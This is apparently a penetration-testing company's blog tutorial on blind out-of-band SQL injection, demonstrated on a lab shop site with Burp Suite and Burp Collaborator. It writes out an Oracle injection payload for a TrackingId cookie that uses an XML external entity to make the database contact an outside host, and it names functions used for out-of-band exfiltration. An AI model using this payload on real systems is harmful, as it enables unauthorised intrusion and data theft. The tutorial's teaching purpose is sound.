Blind Out of Band SQLI Exploitation

Blind Out of Band SQLI Exploitation - Securium Solutions

Greeting everyone! Hope everything is going good!

Today in this blog we Will Discuss How Blind out-of-band SQLI Work? What an attacker manipulate through Out-of-band technique today we will go through complete practical session either this type of attacks are not new for you.

Main Goal of Blind Out-of-band attack cause Lack of input validation on web application of-band SQL injection attack exfiltrate data through outbound channel, can be either DNS or HTTP protocol. As Out-of -band Techniques allow an attacker or Tester to perform Verify and  exploit vulnerability  which is based of Blind . In Out-of-band Attacker or tester do not get output of exploit directly .

Function that  can be  file operation function (for instance: load_file(), master..xp_dirtree) or establish connection function (for instance: DBMS_LDAP.INIT, UTL_HTTP.request).

Is Your Website is vulnerable For Blind SQLI With OOB?

  • Weak Implementation Of Input Validation
  • Network environment that  allow targeted server to initiate outbound request protocol such as DNS or http to public without restriction of security perimeter.

How To Test For  Blind Out of band  SQLI:

Here  We Will Go Through Demonstrate Against Security loopholes Here We will Use burp Collaborator to Perform Successful Attack against our targeted Domain .

As Using Burp collaborator Client blind SQLI OOB Which we can verify by using payload that trigger an Interaction with an external system which verify against vulnerability .

Now , Here We have Our lab Now we are in vulnerable shop Website Which is vulnerable for Blind SQLI OOB ,  As above we have different product items for checkout ,

We See We have different Products Section Click On any Product page And now You will Redirect to Product Page.

Now To check page http request and response section which make our testing phase more easy here we will use burp suite to capture out going Request.

As above picture we see TrackingId= Parameter which is vulnerable for SQLI With OOB

Now, To check against issue we will use burp collaborator client for external interaction  As Below Picture we have Burp collaborator client.

Now We copied Server address from Burp collaborator client for checking against issue and now As above we Use SQL Payload With Injecting OOB Techniques x’+UNION+SELECT+extractvalue(xmltype(‘<%3fxml+version%3d”1.0″+encoding%3d”UTF-8″%3f><!DOCTYPE+root+[+<!ENTITY+%25+remote+SYSTEM+”http%3a//”>+%25remote%3b]>’),’/l’)+FROM+dual–.

We change  TrackingId= Value As above payload,

As Server Response we got 200 And By manipulating external interaction With DNS Or HTTP which successfully verified Domain Is Vulnerable for OOB As 

It interact through external server Through SQL Payload.  As now which based  you can simply check the logs of your DNS server and check what the exfiltrated information was manipulated.

Conclusion: In this Blog we Discussed How Blind SQLI Work with help of OOB Request We Successfully verified How OOB Help us to External Interaction And Verify Possibility Exploit Against Targeted Server .

Thanks For Reading……. See You In Another Blog!

Stick With Our Blog : Click Here


Pallab Jyoti Borah

VAPT Analyst

Table of Contents

Social Media